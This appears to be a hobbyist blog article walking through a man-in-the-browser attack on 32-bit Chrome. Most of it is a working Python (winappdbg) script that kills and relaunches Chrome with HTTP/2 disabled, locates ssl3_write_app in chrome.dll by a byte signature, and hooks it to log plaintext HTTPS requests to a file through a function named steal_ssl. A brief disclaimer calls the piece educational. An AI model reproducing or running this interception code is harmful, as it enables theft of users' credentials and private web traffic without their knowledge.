Man in the browser on Chrome
Another weekend, another Mitb article!
This time We will talk about Chrome 32bit (one of the latest version).
Before proceed...
The only purpose of this article is to illustrate how bad guys develop their malicious software.
I don't take any responsibility about illegal actions carried out by readers.
Curiosity is how software works, not how to damage others!
After some googling I was able to identify chrome.dll as holder of SSL3 methods; in particular of ssl3_write_app method.
It has been helpful the following code (in order to find the pid of process where chrome.dll is loaded):
from winappdbg import * System.request_debug_privileges() debug = Debug() if __name__ == "__main__": system = System() tup = () requests = [] for p in system: found = False if "chrome.exe" in str(p.get_filename()): process = Process(p.get_pid()) bits = process.get_bits() for mod in process.iter_modules(): if "chrome.dll" in mod.get_filename().lower(): found = True chrome_dll = mod mod_addr = chrome_dll.get_base() mod_size = chrome_dll.get_size() print p.get_pid()I was able to identify the SSL3 structure signature which starts with "0000000304030000".
We could easily place a breakpoint on each address in order to find ssl3_write_app.
Furthermore, like on Firefox, We need to disable http2 with command line flag --disable-http2.
So follows the final Python script:
from winappdbg import * System.request_debug_privileges() debug = Debug() def reverseList(aList): rev = aList[::-1] outString = "" for el in rev: outString += el + "" return outString def toHex(s): lst = [] for ch in s: hv = hex(ord(ch)).replace('0x', '') if len(hv) == 1: hv = '0'+hv lst.append(hv) return reduce(lambda x,y:x+y, lst) def steal_ssl(event): f = open("log_chrome.bin","a") process = event.get_process() thread = event.get_thread() stack = thread.get_sp() subsystem = process.read_pointer(stack+0x4) value_p = process.read_pointer(stack+0x8) value = process.read(value_p, 1) while value[-1:] != 'x00': value += process.read(value_p+len(value),1) f.write(value) print "Data: %d, %s"%(subsystem,value) f.close() debug.cont(event) def scan(c_kill): system = System() tup = () requests = [] for p in system: found = False if "chrome.exe" in str(p.get_filename()): process = Process(p.get_pid()) if c_kill == 0: for pp in system: if "chrome.exe" in str(pp.get_filename()): pp.kill() system.start_process(str(p.get_filename()) + " --disable-http2") return -1 bits = process.get_bits() for mod in process.iter_modules(): if "chrome.dll" in mod.get_filename().lower(): found = True chrome_dll = mod mod_addr = chrome_dll.get_base() mod_size = chrome_dll.get_size() print p.get_pid() # Print Pre-Encrypted Request hook_ssl = [] addresses = process.search_bytes("\x00\x00\x00\x03\x04\x03\x00\x00", minAddr=int(mod_addr+1), maxAddr=int(mod_addr+mod_size)) for a in addresses: a = a + 48 ssl_write = process.read(a, 4) tmp = toHex(reverseList(ssl_write)) debug.attach(p.get_pid()) debug.break_at(p.get_pid(), int(tmp, 16),steal_ssl) c = 0 try: debug.loop() finally: debug.detach(p.get_pid()) if __name__ == "__main__": c_kill = 0 scan(c_kill) c_kill += 1 scan(c_kill)Good Saturday night :)